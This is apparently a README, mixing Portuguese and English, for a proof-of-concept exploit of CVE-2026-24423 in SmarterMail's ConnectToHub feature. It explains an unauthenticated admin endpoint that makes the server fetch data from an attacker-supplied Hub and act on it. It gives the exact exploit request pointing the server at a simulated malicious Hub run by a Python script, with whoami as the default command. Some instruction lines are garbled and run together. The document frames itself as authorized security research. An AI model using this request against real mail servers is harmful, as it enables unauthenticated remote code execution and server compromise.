
Script de reprodução para CVE-2026-24423, uma violação de limite de confiança no SmarterMail ConnectToHub que leva a SSRF e potencial execução remota de código. Inclui um servidor Hub simulado e instruções para acionar a API vulnerável.
# CVE-2026-24423 – Reprodução
> ⚠️ **Apenas para pesquisa de segurança e testes autorizados / For security research and authorized testing only**
## Visão geral (Overview)
Este projeto é usado para reproduzir a vulnerabilidade **CVE-2026-24423**.
A vulnerabilidade existe na funcionalidade **SmarterMail ConnectToHub**, e sua causa raiz é:
- A interface de nível administrativo não requer autenticação
- O servidor conecta-se ativamente ao Hub especificado pelo usuário (SSRF)
- Os dados retornados pelo Hub externo são usados diretamente em operações locais de nível de sistema
Esta vulnerabilidade é uma **violação de limite de confiança em nível de design (Trust Boundary Violation)**, que pode, em última análise, levar à execução remota de código.
Este repositório é usado apenas para **validação de vulnerabilidade e pesquisa técnica**, não para exploração com fins maliciosos.
Start Hub Simulation Server
python3 cve-2026-24423.py
Este script irá:
SystemMountTrigger the Vulnerable API
Use Yakit ou Burp Suite para enviar a solicitação:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
Esta interface não requer autenticação No authentication is required.
Troubleshooting
Se a reprodução da vulnerabilidade falhar:
MountPath em cve-2026-24423.pyResult
Quando a vulnerabilidade é acionada com sucesso, o SmarterMail analisa os dados retornados pelo Hub; o código padrão executa apenas o comando whoami.
Exemplo de captura de tela / Example:

Este projeto foi concluído por ChatGPT.